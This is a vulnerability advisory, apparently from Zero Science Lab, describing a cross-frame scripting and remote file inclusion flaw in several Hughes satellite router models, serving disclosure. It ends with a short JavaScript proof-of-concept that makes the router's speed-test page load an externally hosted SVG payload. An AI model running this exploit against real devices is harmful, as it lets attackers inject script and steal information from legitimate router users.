Headline
Hughes Satellite Router Remote File Inclusion Cross Frame Scripting
Hughes Satellite Router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application. Affected versions include HX200 8.3.1.14, HX90 6.11.0.5, HX50L 6.10.0.18, HN9460 8.2.0.48, and HN7000S 6.9.0.37.
Hughes Satellite Router Remote File Inclusion Cross-Frame ScriptingVendor: Hughes Network Systems, LLCProduct web page: https://www.hughes.comAffected version: HX200 v8.3.1.14 HX90 v6.11.0.5 HX50L v6.10.0.18 HN9460 v8.2.0.48 HN7000S v6.9.0.37Summary: The HX200 is a high-performance satellite router designed toprovide carrier-grade IP services using dynamically assigned high-bandwidthsatellite IP connectivity. The HX200 satellite router provides flexibleQuality of Service (QoS) features that can be tailored to the networkapplications at each individual remote router, such as Adaptive ConstantBit Rate (CBR) bandwidth assignment to deliver high-quality, low jitterbandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,and DNS Server/Relay functionality, together with a high-performancesatellite modem, the HX200 is a full-featured IP Router with an integratedhigh-performance satellite router. The HX200 enables high- performanceIP connectivity for a variety of applications including cellular backhaul,MPLS extension services, virtual leased line, mobile services and otherhigh-bandwidth solutions.Desc: The router contains a cross-frame scripting via remote file inclusionvulnerability that may potentially be exploited by malicious users to compromisean affected system. This vulnerability may allow an unauthenticated malicioususer to misuse frames, include JS/HTML code and steal sensitive informationfrom legitimate users of the application.Tested on: WindWeb/1.0Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2022-5743Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php23.12.2022--snippet:///XFSRFI//// Hughes Satellite Router RFI/XFS PoC Exploit// by lqwrm 2022////URL http://TARGET/fs/dynaform/speedtest.html//Reload target//window.location.reload()console.log("Loading Broadband Satellite Browsing Test");//Add cross-frame file include (http only)AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");console.log("Calling StartTest()");StartTest()//console.log("Calling DoTest()");//DoTest()//Unload weapon//document.getElementById("URLList").remove();